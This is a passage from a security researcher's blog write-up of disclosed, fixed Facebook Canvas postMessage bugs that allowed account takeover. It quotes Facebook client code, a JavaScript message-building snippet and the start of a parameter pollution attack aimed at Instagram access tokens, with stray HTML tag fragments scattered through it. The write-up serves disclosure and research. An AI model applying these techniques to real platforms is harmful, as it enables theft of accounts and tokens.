<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Summery" />
<meta property="og:description" content="Summery" />
<link rel="canonical" href="http://localhost:4000/2021/09/03/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers.html" />
<meta property="og:url" content="http://localhost:4000/2021/09/03/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-09-03T04:22:42+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2021-09-03T04:22:42+01:00","datePublished":"2021-09-03T04:22:42+01:00","description":"Summery","headline":"More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/09/03/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers.html"},"url":"http://localhost:4000/2021/09/03/more-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">More secure Facebook Canvas : Tale of $126k worth of bugs that lead to Facebook Account Takeovers</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2021-09-03T04:22:42+01:00" itemprop="datePublished">Sep 3, 2021
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">qw</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><strong>Summery</strong></p>

<p>Facebook allowed online games owners to host their games/applications in apps.facebook.com for many years now. The idea and technology behind it was that the game ( Flash or HTML5 based) would be hosted in the owner website and later the website page hosting it should be shown to the Facebook user in apps.facebook.com inside a controlled iframe. Since the game is not hosted in Facebook and for best user experience like keeping score and profile data, Facebook had to establish a communication channel with the game owner to verify the identity of the Facebook user for example. This was ensured by using cross windows communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, i’ll be discussing multiple vulnerabilities i found in this implementation.</p>

<p><strong>Vulnerabilities potential</strong></p>

<p>These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible of verifying what’s coming through this channel. The bugs explained below (and others) allowed me to takeover any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high since these were present for years and billions of user and their information could have been compromised easily since this was served from inside Facebook. Facebook confirmed they didn’t see any indicators of previous abuse or exploitation of these bugs.</p>

<p><strong>For Researchers</strong></p>

<p>Before explaining the actual bugs below, i tried to show the way i decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn’t left much to dig but i hope the information shared could help you in your research. If you are only interested in the bugs themselves then jump to each bug section part.</p>

<p><strong>Description</strong></p>

<p>So far we know that the game page being served inside an iframe in apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions , for example , is to show a dialog to the user that would allow him to confirm the usage of the Facebook application owned by the game developers which would help me to identify you and get some information from an access token that they’ll receive if the user decided to user the application. The script responsible of receiving the cross window messages, interpreting them and understanding the action demanded is below ( only necessary parts are shown and as they were before the bugs were fixed ) :</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
            <span class="nx">handleMessage</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">Log</span><span class="dl">"</span><span class="p">).</span><span class="nf">debug</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter at </span><span class="dl">"</span> <span class="o">+</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="o">!==</span> <span class="dl">""</span> <span class="p">?</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span> <span class="p">:</span> <span class="nb">window</span> <span class="o">==</span> <span class="nx">top</span> <span class="p">?</span> <span class="dl">"</span><span class="s2">top</span><span class="dl">"</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">[no name]</span><span class="dl">"</span><span class="p">)</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> handleMessage </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">a</span><span class="p">));</span>
                <span class="k">if </span><span class="p">(</span><span class="k">typeof</span> <span class="nx">a</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">string</span><span class="dl">"</span> <span class="o">&amp;&amp;</span> <span class="sr">/^FB_RPC:/</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">a</span><span class="p">))</span> <span class="p">{</span>
                    <span class="nx">k</span><span class="p">.</span><span class="nf">enqueue</span><span class="p">([</span><span class="nx">a</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">7</span><span class="p">),</span> <span class="p">{</span>
                        <span class="na">origin</span><span class="p">:</span> <span class="nx">b</span><span class="p">,</span>
                        <span class="na">source</span><span class="p">:</span> <span class="nx">e</span> <span class="o">||</span> <span class="nx">i</span><span class="p">[</span><span class="nx">h</span><span class="p">]</span>
                    <span class="p">}]);</span>
           <span class="p">...</span>
            <span class="nx">send</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">f</span> <span class="o">=</span> <span class="nx">e</span> <span class="k">in</span> <span class="nx">i</span> <span class="p">?</span> <span class="nx">e</span> <span class="p">:</span> <span class="nx">h</span><span class="p">;</span>
                <span class="nx">a</span> <span class="o">=</span> <span class="k">typeof</span> <span class="nx">a</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">string</span><span class="dl">"</span> <span class="p">?</span> <span class="nx">a</span> <span class="p">:</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">QueryString</span><span class="dl">"</span><span class="p">).</span><span class="nf">encode</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span>
                <span class="nx">b</span> <span class="o">=</span> <span class="nx">b</span><span class="p">;</span>
                <span class="k">try</span> <span class="p">{</span>
                    <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageToSpecificOrigin</span><span class="p">(</span><span class="nx">b</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span>
                <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">Log</span><span class="dl">"</span><span class="p">).</span><span class="nf">error</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter: Proxy for %s not available, page might have been navigated: %s</span><span class="dl">"</span><span class="p">,</span> <span class="nx">f</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">message</span><span class="p">),</span> <span class="k">delete</span> <span class="nx">i</span><span class="p">[</span><span class="nx">f</span><span class="p">]</span>
                <span class="p">}</span>
                <span class="k">return</span> <span class="o">!</span><span class="mi">0</span>
            <span class="p">}</span>
<span class="p">...</span>

    <span class="nb">window</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">message</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterSyn</span><span class="p">)</span> <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageAllowAnyOrigin_UNSAFE</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="p">{</span>
            <span class="na">xdArbiterAck</span><span class="p">:</span> <span class="o">!</span><span class="mi">0</span>
        <span class="p">});</span>
        <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterRegister</span><span class="p">)</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">b</span> <span class="o">=</span> <span class="nx">l</span><span class="p">.</span><span class="nf">register</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdProxyName</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">origin</span><span class="p">);</span>
            <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">SecurePostMessage</span><span class="dl">"</span><span class="p">).</span><span class="nf">sendMessageAllowAnyOrigin_UNSAFE</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">,</span> <span class="p">{</span>
                <span class="na">xdArbiterRegisterAck</span><span class="p">:</span> <span class="nx">b</span>
            <span class="p">})</span>
        <span class="p">}</span> <span class="k">else</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">xdArbiterHandleMessage</span> <span class="o">&amp;&amp;</span> <span class="nx">l</span><span class="p">.</span><span class="nf">handleMessage</span><span class="p">(</span><span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">message</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">source</span><span class="p">)</span>
<span class="p">}),</span> <span class="mi">98</span><span class="p">);</span>

<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">JSONRPC</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
        <span class="nx">c</span><span class="p">.</span><span class="nx">read</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">c</span><span class="p">)</span> <span class="p">{</span>
            <span class="p">...</span>
            <span class="nx">e</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">local</span><span class="p">[</span><span class="nx">a</span><span class="p">.</span><span class="nx">method</span><span class="p">];</span>
            <span class="k">try</span> <span class="p">{</span>
                <span class="nx">e</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nf">apply</span><span class="p">(</span><span class="nx">c</span> <span class="o">||</span> <span class="kc">null</span><span class="p">,</span> <span class="nx">a</span><span class="p">.</span><span class="nx">params</span><span class="p">);</span>
                <span class="k">typeof</span> <span class="nx">e</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">undefined</span><span class="dl">"</span> <span class="o">&amp;&amp;</span> <span class="nf">g</span><span class="p">(</span><span class="dl">"</span><span class="s2">result</span><span class="dl">"</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span>
            <span class="p">...</span>
    <span class="nx">e</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="nx">a</span>
<span class="p">}),</span> <span class="kc">null</span><span class="p">);</span>

<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformAppController</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
<span class="kd">function</span> <span class="nf">f</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span>
         <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformDialogClient</span><span class="dl">"</span><span class="p">).</span><span class="k">async</span><span class="p">(</span><span class="nx">f</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">d</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="nf">b</span><span class="p">(</span><span class="nx">d</span><span class="p">)</span> <span class="p">});</span>
<span class="p">}...</span>
<span class="nx">t</span><span class="p">.</span><span class="nx">local</span><span class="p">.</span><span class="nx">showDialog</span> <span class="o">=</span> <span class="nx">f</span><span class="p">;</span>

<span class="p">...</span>

<span class="nx">t</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">JSONRPC</span><span class="dl">"</span><span class="p">))(</span><span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">d</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">origin</span> <span class="o">||</span> <span class="nx">k</span><span class="p">;</span>
            <span class="nx">b</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">source</span><span class="p">;</span>
            <span class="k">if </span><span class="p">(</span><span class="nx">b</span> <span class="o">==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
                <span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">ge</span><span class="dl">"</span><span class="p">)(</span><span class="nx">j</span><span class="p">);</span>
                <span class="nx">b</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">contentWindow</span>
            <span class="p">}</span>
            <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">XdArbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">d</span><span class="p">)</span>
        <span class="p">}</span>
<span class="p">...</span>

<span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;}</span><span class="se">)</span><span class="sr">, null</span><span class="se">)</span><span class="err">;
</span>
<span class="nf">__d</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformDialogClient</span><span class="dl">"</span><span class="p">,</span> <span class="p">...</span>
<span class="kd">function</span> <span class="nf">async</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
        <span class="kd">var</span> <span class="nx">f</span> <span class="o">=</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">guid</span><span class="dl">"</span><span class="p">)(),</span>
            <span class="nx">g</span> <span class="o">=</span> <span class="nx">b</span><span class="p">.</span><span class="nx">state</span><span class="p">;</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">state</span> <span class="o">=</span> <span class="nx">f</span><span class="p">;</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/dialog/return/arbiter</span><span class="dl">"</span><span class="p">).</span><span class="nf">setSubdomain</span><span class="p">(</span><span class="dl">"</span><span class="s2">www</span><span class="dl">"</span><span class="p">).</span><span class="nf">setFragment</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">QueryString</span><span class="dl">"</span><span class="p">).</span><span class="nf">encode</span><span class="p">({</span>
            <span class="na">origin</span><span class="p">:</span> <span class="nx">b</span><span class="p">.</span><span class="nx">redirect_uri</span>
        <span class="p">})).</span><span class="nf">getQualifiedURI</span><span class="p">().</span><span class="nf">toString</span><span class="p">();</span>
        <span class="nx">b</span><span class="p">.</span><span class="nx">display</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">;</span>
        <span class="nx">j</span><span class="p">[</span><span class="nx">f</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
            <span class="na">callback</span><span class="p">:</span> <span class="nx">e</span> <span class="o">||</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
            <span class="na">state</span><span class="p">:</span> <span class="nx">g</span>
        <span class="p">};</span>
        <span class="nx">e</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">;</span>
        <span class="nf">d</span><span class="p">(</span><span class="dl">"</span><span class="s2">AsyncDialog</span><span class="dl">"</span><span class="p">).</span><span class="nf">send</span><span class="p">(</span><span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">AsyncRequest</span><span class="dl">"</span><span class="p">))(</span><span class="k">this</span><span class="p">.</span><span class="nf">getURI</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)).</span><span class="nf">setMethod</span><span class="p">(</span><span class="nx">e</span><span class="p">).</span><span class="nf">setReadOnly</span><span class="p">(</span><span class="o">!</span><span class="mi">0</span><span class="p">).</span><span class="nf">setAbortHandler</span><span class="p">(</span><span class="nf">k</span><span class="p">(</span><span class="nx">f</span><span class="p">)).</span><span class="nf">setErrorHandler</span><span class="p">(</span><span class="nf">l</span><span class="p">(</span><span class="nx">f</span><span class="p">)))</span>
    <span class="p">}</span>
<span class="p">...</span>
<span class="kd">function</span> <span class="o">&lt;</span><span class="nx">meta</span> <span class="nx">content</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/html; charset=utf-8</span><span class="dl">"</span> <span class="nx">http</span><span class="o">-</span><span class="nx">equiv</span><span class="o">=</span><span class="dl">"</span><span class="s2">content-type</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/meta&gt;getURI</span><span class="se">(</span><span class="sr">a, b</span><span class="se">)</span><span class="sr"> </span><span class="err">{
</span>        <span class="k">if </span><span class="p">(</span><span class="nx">b</span><span class="p">.</span><span class="nx">version</span><span class="p">)</span> <span class="p">{</span>
            <span class="kd">var</span> <span class="nx">d</span> <span class="o">=</span> <span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">b</span><span class="p">.</span><span class="nx">version</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">/dialog/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">);</span>
            <span class="k">delete</span> <span class="nx">b</span><span class="p">.</span><span class="nx">version</span><span class="p">;</span>
            <span class="k">return</span> <span class="nx">d</span><span class="p">.</span><span class="nf">addQueryData</span><span class="p">(</span><span class="nx">b</span><span class="p">)</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">PlatformVersioning</span><span class="dl">"</span><span class="p">).</span><span class="nf">versionAwareURI</span><span class="p">(</span><span class="k">new</span><span class="p">(</span><span class="nf">c</span><span class="p">(</span><span class="dl">"</span><span class="s2">URI</span><span class="dl">"</span><span class="p">))(</span><span class="dl">"</span><span class="s2">/dialog/</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">a</span><span class="p">).</span><span class="nf">addQueryData</span><span class="p">(</span><span class="nx">b</span><span class="p">))</span>
    <span class="p">}</span>

<span class="p">}),</span> <span class="mi">98</span><span class="p">);</span>


</code></pre></div></div>

<p>To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs :</p>

<p>Iframe sends message to parent <strong>=&gt;</strong> Message event dispatched in <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter <strong>=&gt;</strong> Message handler function passes data to handleMessage function <strong>=&gt;</strong> “enqueue” function passes to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;JSONRPC =&gt; <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;JSONRPC.read calls this.local.<meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;showDialog function in <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformAppController <strong>=&gt;</strong> function checks message and if all valid, call <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformDialogClient <strong>=&gt;</strong> <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;PlatformDialogClient.async sends a POST request to <strong>apps.facebook.com/dialog/oauth</strong> , returned access_token would be passed to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter.send function ( few steps were skipped ) <strong>=&gt;</strong> <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt; <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;XdArbiter.send would send a cross window message to the iframe window <strong>=&gt;</strong> Event dispatched in iframe window containing Facebook user access_token</p>

<p>Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts:</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span><span class="dl">"</span><span class="s2">jsonrpc</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">2.0</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">showDialog</span><span class="dl">"</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span>
                                    <span class="dl">"</span><span class="s2">params</span><span class="dl">"</span><span class="p">:[{</span><span class="dl">"</span><span class="s2">method</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">permissions.oauth</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">display</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">async</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">redirect_uri</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">https://ysamm.com/callback</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">app_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">client_id</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">&lt;meta content=</span><span class="dl">"</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span> <span class="nx">charset</span><span class="o">=</span><span class="nx">utf</span><span class="o">-</span><span class="mi">8</span><span class="dl">"</span><span class="s2"> http-equiv=</span><span class="dl">"</span><span class="nx">content</span><span class="o">-</span><span class="nx">type</span><span class="dl">"</span><span class="s2">&gt;&lt;/meta&gt;APP_ID</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">response_type</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">token</span><span class="dl">"</span><span class="p">}]})</span>
                <span class="nx">fullmsg</span> <span class="o">=</span> <span class="p">{</span><span class="na">xdArbiterHandleMessage</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="na">message</span><span class="p">:</span><span class="dl">"</span><span class="s2">FB_RPC:</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span> <span class="p">,</span> <span class="na">origin</span><span class="p">:</span> <span class="nx">IFRAME_ORIGIN</span><span class="p">}</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">parent</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span><span class="nx">fullmsg</span><span class="p">,</span><span class="dl">"</span><span class="s2">*</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>

<p>Interested parts to manipulate are : <br />
– <strong>IFRAME_ORIGIN</strong>, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token<br />
– Keys and values of the object inside <strong>params</strong> , there are the parameters to be appended to <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;apps.facebook.com/dialog/oauth. Most interesting ones are redirect_uri ( which can replace <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> in the POST request in some cases ) and <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>APP_ID</strong></p>

<p><strong>Attacks vectors/scenarios</strong></p>

<p>What we’ll do here is to try to instead of requesting an access token for the game application we own, we’ll try to get one of a Facebook first party application like Instagram. What’s holding us back is although we control the <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;IFRAME_ORIGIN and <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;APP_ID which we can set to match the Instagram application as www.instagram.com and 124024574287414, later the message sent to the iframe containing the first party access token would have a targetOrigin in postMessage as www.instagram.com which is not our window origin. Facebook did a good job protecting against these attacks ( i’ll argue though to why not using the origin from the event message received and matching app_id to the hosted game instead of giving us total freedom which could have prevented all these bugs ), but apparently they left some weaknesses that could have been exploited for many years.</p>

<p><strong>Bug 1: Parameter Pollution, it was checked server-side and we **definitely</strong> should trust it**</p>

<p>This bug occurs due to the fact that the POST request to <strong>https://apps.facebook.com/dialog/oauth</strong> when constructed from the received message from the iframe, could contain user controlled parameters. <br />
All parameters are checked in the client-side ( PlatformAppController, showDialog method and ,PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController , also AsyncRequest module seems to be doing some filtering ( removing parameters that already exist but brackets were appended to it ).</p>

<p>However due to some missing checking in the server-side, a parameter name set to <strong>PARAM[random</strong> would replace a previously set parameter <strong>PARAM</strong> ; for example <strong>redirect_uri[0</strong> parameter value would replace <strong>redirect_uri</strong>. We can abuse this as follow : <br />
1) Set <strong>APP_ID</strong> to be the Instagram application id. <br />
2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72 ) using <meta content="text/html; charset=utf-8" http-equiv="content-type" />&lt;/meta&gt;<strong>IFRAME_ORIGIN</strong> ( will end up <strong>https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com</strong> ) , which would be sent matching our iframe window origin but won’t be used at all as explained below. <br />
